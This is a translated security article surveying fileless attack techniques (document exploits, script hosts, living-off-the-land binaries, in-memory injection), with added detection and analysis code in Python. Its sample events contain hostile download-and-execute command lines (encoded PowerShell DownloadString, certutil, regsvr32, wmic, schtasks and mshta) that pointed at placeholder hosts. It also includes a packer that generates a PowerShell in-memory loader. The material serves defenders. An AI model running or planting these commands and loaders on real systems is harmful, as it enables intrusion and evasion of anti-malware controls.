Analysis of four common "fileless" attack techniques

Posted by fierce at 2020-03-08

To deal with the growing number of fileless attacks, we first need to define clearly what "fileless" means, so that we can analyze the techniques these attacks use and their impact on existing environments and defenses.

In the security field, a fileless attack represents a serious threat. The term "fileless" was coined while exploring ways to bypass detection techniques aimed at malicious files.

Fileless attack techniques use a series of means that let attackers compromise systems protected by anti-virus and application whitelisting. Below is an overview of these techniques, with an accurate and clear description of the threat they pose.

Technique 1: malicious documents

Many of the attacks classified as fileless involve documents. In such attacks, the adversary typically uses a malicious document (most commonly an e-mail attachment) for the following purposes:

Documents can serve as flexible carriers and containers for other files.

For example, attackers embed JavaScript files in Microsoft Office documents and use social engineering to induce the recipient to double-click and run the script. Other document formats that can embed files include PDF and RTF. Because these are legitimate features of the respective applications, anti-malware technology usually does not interfere with their use.

Documents can carry exploits for vulnerabilities.

The complexity of modern document formats provides a broad attack surface for exploitation. Typically the exploit triggers execution of bundled shellcode in the memory space of the application that parsed the document. In this way the attacker gains control of the endpoint without ever storing malicious code on the local file system.

Documents can carry the logic of the infection.

Modern documents support powerful scripting capabilities; for example, Microsoft Office supports VBA macros. Most anti-malware products cannot reliably distinguish a malicious script from a benign one, so this feature lets the attacker implement the infection without compiling a program. Document scripts can, among other things, launch programs and download further malicious code.

Although the document itself is still stored in the endpoint's local file system, this approach avoids the traditional step of writing a malicious executable to disk. In most cases the document directs malicious code to execute directly in the endpoint's memory.

For a case of an attacker launching an attack through a document, see the write-up on the misuse of Microsoft Office's support for DDE. Another scenario worth reading about is attackers inserting themselves into an ongoing conversation to spread malware.
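To make the "container" and DDE points above concrete, here is an added Python example (not code from the original article or from Minerva) that inspects an OOXML document held in memory for the parts that turn it into a carrier: a VBA project, embedded OLE objects, and DDE/DDEAUTO field codes. The sample document it builds is constructed for the demo; the part names are the standard OOXML ones, and the OLE stubs carry only the magic bytes.

```python
import io
import re
import zipfile
from typing import List

# Parts of an OOXML (docx/docm/xlsx) container that make a document a carrier
# for other code: VBA projects and embedded OLE objects (which may wrap a
# script or executable, as the text above describes).
SUSPECT_PARTS = {
    "word/vbaProject.bin": "VBA macro project",
    "xl/vbaProject.bin": "VBA macro project",
    "word/embeddings/": "embedded OLE object (may wrap a script or executable)",
    "xl/embeddings/": "embedded OLE object (may wrap a script or executable)",
}
# Field instructions live in <w:instrText>; DDE / DDEAUTO fields launch a program.
INSTR_TEXT = re.compile(r"<w:instrText[^>]*>(.*?)</w:instrText>", re.S)
DDE_FIELD = re.compile(r"\bDDE(?:AUTO)?\b", re.I)


def inspect_ooxml(data: bytes) -> List[str]:
    """Return human-readable findings for one OOXML document held in memory."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as z:
        for name in z.namelist():
            for prefix, desc in SUSPECT_PARTS.items():
                if name.startswith(prefix):
                    findings.append(f"{name}: {desc}")
            if name.endswith(".xml"):
                text = z.read(name).decode("utf-8", "replace")
                # Word may split one field code across several instrText runs,
                # so join them before matching rather than testing each run alone.
                field_code = " ".join(m.group(1) for m in INSTR_TEXT.finditer(text))
                if DDE_FIELD.search(field_code):
                    findings.append(f"{name}: DDE field -> {field_code.strip()}")
    return findings


def build_sample_docx() -> bytes:
    """Constructed test document (not a real-world sample): a DDEAUTO field plus
    a VBA project stub and an embedded OLE object stub."""
    document_xml = (
        '<?xml version="1.0" encoding="UTF-8"?>'
        '<w:document xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main">'
        "<w:body><w:p>"
        '<w:r><w:fldChar w:fldCharType="begin"/></w:r>'
        '<w:r><w:instrText xml:space="preserve"> DDEAUTO c:\\\\windows\\\\system32\\\\cmd.exe "/k calc.exe" </w:instrText></w:r>'
        '<w:r><w:fldChar w:fldCharType="end"/></w:r>'
        "</w:p></w:body></w:document>"
    )
    ole_stub = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\x00" * 24  # OLE2 magic only
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", document_xml)
        z.writestr("word/vbaProject.bin", ole_stub)
        z.writestr("word/embeddings/oleObject1.bin", ole_stub)
    return buf.getvalue()


if __name__ == "__main__":
    for line in inspect_ooxml(build_sample_docx()):
        print(line)
```

The check is deliberately structural: it flags what the container carries, not what the macro or object does, so a document with a VBA project is reported whether or not the macro is malicious. Legacy binary formats (.doc, .xls) and RTF/PDF need different parsers and are not covered here.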

Technique 2: malicious scripts

Rather than compiling their code into an executable binary, malware authors increasingly run attacks in "fileless" script form. Beyond the native script support in documents mentioned above, running scripts directly under Microsoft Windows has the following advantages for the attacker:

Scripts interact with the system directly, without the restrictions other applications impose on scripts, such as a browser's checks.

Scripts are harder for anti-malware technology to detect than compiled malicious executables.

To evade behavioral detection, the malicious logic can be flexibly split across several processes.

Obfuscation can be used to delay analysis and better evade anti-malware detection.

The script interpreters built into Microsoft Windows include PowerShell, VBScript, batch files and JScript (JavaScript).

The corresponding host programs are powershell.exe, cscript.exe (or wscript.exe), cmd.exe and mshta.exe.

In addition, the Windows Subsystem for Linux broadens the range of scripting languages available on the platform. One challenge this creates is the need for organizations to restrict abuse of these tools; see Gal Bitensky's article on the subject.

Attackers can also easily obfuscate attack scripts with the help of various framework tools.

These obfuscation frameworks include Daniel Bohannon's Invoke-Obfuscation and Invoke-DOSfuscation for PowerShell. For a worked case, see Minerva's analysis of script obfuscation seen in the wild.

Technique 3: living off the land

Discussion of fileless attacks often includes abuse of the many tools built into Microsoft Windows. These tools make it easy for an attacker to "jump" from one stage of the attack to the next without executing any compiled binary of their own. This mode of operation is sometimes referred to as "living off the land".

Once the attacker's malicious code can interact with native programs, the attacker may use the system's own tools to carry out the next steps, including downloading additional malicious code, launching programs, executing scripts, stealing data, moving laterally and maintaining access.

Tools attackers call for these purposes include regsvr32.exe, rundll32.exe, certutil.exe and schtasks.exe. For a more comprehensive catalog of built-in programs, libraries and scripts abused this way, see Oddvar Moe's LOLBAS project.

Windows Management Instrumentation (WMI) is a built-in component of Windows that gives attackers an excellent opportunity to live off the land. WMI lets an attacker manipulate most of the device's configuration by running wmic.exe or by executing scripts (for example PowerShell) that call into it.

These tools are all present on the system and trusted, so anti-malware technology has difficulty detecting and restricting their use. For details of fileless attacks that abuse WMI, see Matt Graeber's article:

Abusing WMI to build a persistent, asynchronous, and fileless backdoor (Note 1)

By relying on these trusted system tools, attackers significantly improve their chances of evading anti-malware tools and application whitelisting. For more such cases, see Matthew Dunwoody's write-up of APT29's use of WMI and PowerShell to implant fileless backdoors.
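The script-host abuses in the malicious-scripts section and the living-off-the-land abuses in this section leave a common trace: a process-creation event with a telltale parent, image and command line. Here is an added Python example (not code from the original article or from Minerva) that runs a few such rules over constructed Sysmon-style events: it decodes -EncodedCommand arguments, looks for script indicators, and flags the regsvr32, certutil, wmic and schtasks patterns named above. The event format, the rule set and the indicator lists are my own assumptions, kept deliberately small, and the sample events are constructed, with hostnames under .invalid.

```python
import base64
import re
from typing import Dict, List, Tuple

# Constructed process-creation events (loosely modelled on Sysmon Event ID 1
# fields; not real telemetry). The first one carries an encoded PowerShell
# command built exactly the way -EncodedCommand expects: Base64 of UTF-16LE.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16le")).decode("ascii")
SAMPLE_EVENTS = [
    r'Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|ParentImage=C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE|CommandLine=powershell.exe -nop -w hidden -enc ' + ENCODED,
    r'Image=C:\Windows\System32\certutil.exe|ParentImage=C:\Windows\System32\cmd.exe|CommandLine=certutil.exe -urlcache -split -f http://example.invalid/x.txt x.txt',
    r'Image=C:\Windows\System32\regsvr32.exe|ParentImage=C:\Windows\explorer.exe|CommandLine=regsvr32.exe /s /n /u /i:http://example.invalid/a.sct scrobj.dll',
    r'Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|ParentImage=C:\Windows\explorer.exe|CommandLine=powershell.exe -Command Get-Date',
    r'Image=C:\Windows\System32\wbem\WMIC.exe|ParentImage=C:\Windows\System32\cmd.exe|CommandLine=wmic process call create "mshta http://example.invalid/a.hta"',
    r'Image=C:\Windows\System32\schtasks.exe|ParentImage=C:\Windows\System32\svchost.exe|CommandLine=schtasks.exe /create /tn Updater /tr "mshta http://example.invalid/a.hta" /sc minute',
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cscript.exe", "wscript.exe", "mshta.exe",
                "cmd.exe", "regsvr32.exe", "rundll32.exe", "certutil.exe"}
# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
# The length floor keeps "-ExecutionPolicy Bypass" from matching.
PS_ENCODED = re.compile(r"-e[a-z]*\s+([A-Za-z0-9+/=]{16,})", re.I)
SCRIPT_INDICATORS = ["-nop", "-w hidden", "IEX", "Invoke-Expression", "DownloadString",
                     "DownloadFile", "FromBase64String", "Add-Type", "Start-Process"]
# (image regex, command-line regex, description) for the built-in tools named above
LOLBIN_RULES = [
    (r"certutil\.exe", r"-urlcache|-decode|-encode", "certutil fetching or decoding a payload"),
    (r"regsvr32\.exe", r"/i:\S*https?://|scrobj\.dll", "regsvr32 loading a scriptlet (Squiblydoo)"),
    (r"rundll32\.exe", r"javascript:|vbscript:", "rundll32 executing inline script"),
    (r"mshta\.exe", r"https?://|javascript:|vbscript:", "mshta running remote or inline script"),
    (r"wmic\.exe", r"process\s+call\s+create", "wmic spawning a process"),
    (r"schtasks\.exe", r"/create.*\b(powershell|cscript|wscript|mshta|regsvr32|rundll32)\b",
     "scheduled task launching a script host"),
]


def parse_event(line: str) -> Dict[str, str]:
    """Split one pipe-delimited 'key=value|key=value' record (the assumed format)."""
    return dict(field.split("=", 1) for field in line.split("|"))


def decode_encoded_command(cmdline: str) -> str:
    """Recover the script text hidden behind -EncodedCommand, or '' if there is none."""
    m = PS_ENCODED.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16le", "replace")
    except ValueError:  # binascii.Error is a ValueError subclass
        return ""


def analyze_event(event: Dict[str, str]) -> List[str]:
    image = event.get("Image", "").rsplit("\\", 1)[-1].lower()
    parent = event.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
    cmdline = event.get("CommandLine", "")
    alerts: List[str] = []
    # Technique 1 meets Technique 2: an Office process launching a script host
    if parent in OFFICE_APPS and image in SCRIPT_HOSTS:
        alerts.append(f"{parent} spawned {image} (document-launched script host)")
    if image in ("powershell.exe", "pwsh.exe"):
        decoded = decode_encoded_command(cmdline)
        if decoded:
            alerts.append("encoded PowerShell command: " + decoded.strip())
        text = (cmdline + " " + decoded).lower()
        hits = [i for i in SCRIPT_INDICATORS if i.lower() in text]
        if hits:
            alerts.append("script indicators: " + ", ".join(hits))
        if text.count("`") > 3 or "[char]" in text:
            alerts.append("obfuscation markers (backtick escapes or [char] casting)")
    for image_re, cmd_re, desc in LOLBIN_RULES:
        if re.search(image_re, image) and re.search(cmd_re, cmdline, re.I):
            alerts.append(desc)
    return alerts


def scan(lines: List[str]) -> List[Tuple[int, List[str]]]:
    """Return (event index, alerts) for every event that raised at least one alert."""
    results = []
    for idx, line in enumerate(lines):
        alerts = analyze_event(parse_event(line))
        if alerts:
            results.append((idx, alerts))
    return results


if __name__ == "__main__":
    for idx, alerts in scan(SAMPLE_EVENTS):
        print(f"event {idx}:")
        for a in alerts:
            print("   ", a)
```

The benign "powershell.exe -Command Get-Date" event raises nothing, which is the point of keying on arguments and parentage rather than on the binary name: the binaries are trusted and ubiquitous, so blocking them outright is rarely an option, but their command lines and parent processes are where the abuse shows.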

Technique 4: malicious code in memory

Today's anti-virus products are quite good at detecting malicious files on disk; against malicious code that exists only in memory, however, their efforts bring far less return. Memory is volatile and dynamic, which makes it easy for malware to change shape, and code running there often does so without triggering anti-malware detection at all.

Once an attacker has started executing malicious code on an endpoint (possibly via the techniques above), he can unpack the malware into memory without leaving any trace on disk. This may involve extracting code into the process's own memory space; in other cases the malicious program injects code into another trusted or otherwise legitimate process.

Examples of in-memory attack techniques include the following:

Memory injection using system functions, without exploiting any vulnerability. For example, APIs such as VirtualAllocEx and WriteProcessMemory are often abused by malware for memory injection. For details, see Gal Bitensky's overview of the AZORult attack.


An attacker can bundle a compiled executable into a script, so that the payload is released into memory when the script runs. One common tool for this is PowerSploit; for the procedure, see Asaf Aprozper and Gal Bitensky's GhostMiner analysis (Note 2). Chris Truncer's Veil framework is another example.
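As an added Python example (not code from the original article, from Minerva or from PowerSploit), here are both halves of the bundling trick just described: a packer that embeds a binary in a script as Base64 of a raw DEFLATE stream, which is the shape the compress-and-embed approach takes, and the analyst-side extractor that recovers such payloads from script text by decoding every long Base64 run, trying the common decompressions, and checking for a PE header. The payload is a constructed fake PE and the loader text is an assumed shape; nothing is executed.

```python
import base64
import re
import zlib
from typing import List, Tuple

# Constructed stand-in for a compiled payload: a 64-byte DOS header whose
# e_lfanew points at a "PE\0\0" signature, followed by filler. Not a real
# executable and not loadable; it only has to look like one to the extractor.
FAKE_PE = (b"MZ" + b"\x00" * 58 + (0x40).to_bytes(4, "little")
           + b"PE\x00\x00" + b"This program cannot be run in DOS mode." + bytes(range(256)) * 4)


def deflate_raw(data: bytes) -> bytes:
    """Raw DEFLATE without zlib framing, the stream .NET's DeflateStream produces."""
    c = zlib.compressobj(level=9, wbits=-15)
    return c.compress(data) + c.flush()


def bundle_into_script(payload: bytes) -> str:
    """Attacker side: wrap a binary in a PowerShell loader as Base64(Deflate(payload)).
    The loader text is an assumed shape for the demo, modelled on the
    compress-and-embed approach described in the text; it is never run here."""
    b64 = base64.b64encode(deflate_raw(payload)).decode("ascii")
    return (
        f"$d = [Convert]::FromBase64String('{b64}')\n"
        "$ms = New-Object IO.MemoryStream(,$d)\n"
        "$ds = New-Object IO.Compression.DeflateStream($ms, [IO.Compression.CompressionMode]::Decompress)\n"
        "$out = New-Object IO.MemoryStream; $ds.CopyTo($out)\n"
        "[Reflection.Assembly]::Load($out.ToArray()) | Out-Null\n"
    )


B64_BLOB = re.compile(r"[A-Za-z0-9+/]{64,}={0,2}")


def looks_like_pe(data: bytes) -> bool:
    """Cheap PE check: MZ header and a PE signature at e_lfanew (offset 0x3C)."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(data[0x3C:0x40], "little")
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def _unpack_candidates(blob: bytes):
    """Yield the blob as-is and each decompression of it that succeeds."""
    yield blob
    for wbits in (-15, 15, 31):  # raw DEFLATE, zlib-framed, gzip-framed
        try:
            yield zlib.decompress(blob, wbits)
        except zlib.error:
            continue


def extract_embedded_executables(script: str) -> List[Tuple[int, bytes]]:
    """Analyst side: find Base64 runs in script text that decode (directly or
    after decompression) to something with a PE header. Returns (offset, bytes).
    Caveat: a blob split across string concatenations ('AAA' + 'BBB') must be
    joined first; this pass only sees contiguous runs."""
    found = []
    for m in B64_BLOB.finditer(script):
        try:
            raw = base64.b64decode(m.group(0), validate=True)
        except ValueError:  # binascii.Error is a ValueError subclass
            continue
        for candidate in _unpack_candidates(raw):
            if looks_like_pe(candidate):
                found.append((m.start(), candidate))
                break
    return found


if __name__ == "__main__":
    loader = bundle_into_script(FAKE_PE)
    for offset, pe in extract_embedded_executables(loader):
        print(f"embedded PE at text offset {offset}: {len(pe)} bytes, header {pe[:2]!r}")
```

The extractor is the piece worth keeping: it does not care which packer produced the script, only that a long Base64 run inflates to a PE image, which is the invariant this whole class of "script carries a binary" tooling shares.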

Process Doppelgänging is another fileless technique that does not involve classic memory injection. Instead, the attacker takes advantage of NTFS transactions in Microsoft Windows: a trusted executable is overwritten inside a transaction, a process is created from the transacted file, and the transaction is then rolled back, so the modified content never reaches disk. Anton Ivanov, Fedor Sinitsyn and Orkhan Mamedov analyzed the technique in the SynAck malware.


In-memory techniques let attackers bypass many anti-malware controls, including application whitelisting. Although anti-virus tools try to track memory-injection behavior, the variety of infection methods available to attackers makes this very hard to prevent.

Asaf Aprozper's analysis shows how vulnerable the various detection methods are.

"Fileless" attacks have become the norm

Although only a few attacks and malware families are fileless from start to finish, most malware adds some fileless characteristics to evade detection. Rather than asking whether a threat is fileless end to end, it is more useful for improving future protection to ask which strategies and methods the attack uses to bypass defenses.

Attackers may combine malicious documents, scripts, living-off-the-land techniques and memory injection as described above. Fileless attacks exploit the legitimate functionality of applications and operating systems, together with the inability of anti-malware technology to effectively detect and prevent the abuse of system tools, and this is what has made them the new normal.

This is why more and more enterprises are paying attention to approaches designed specifically to counter fileless attack strategies.

References

Note 1: Chinese translation: Abusing WMI to build a fileless backdoor (basics)

Note 2: GhostMiner analysis: a new approach to fileless mining

Reference: Coming and going: analysis of the JS_POWMET fileless malware

- End -

Kanxue ID: strokmitream

This article was translated by the Kanxue translation team and proofread by Yulin primary school student (Kanxue handle).

Source: Lenny Zeltser @ Minerva

Please credit the Kanxue community when reprinting.
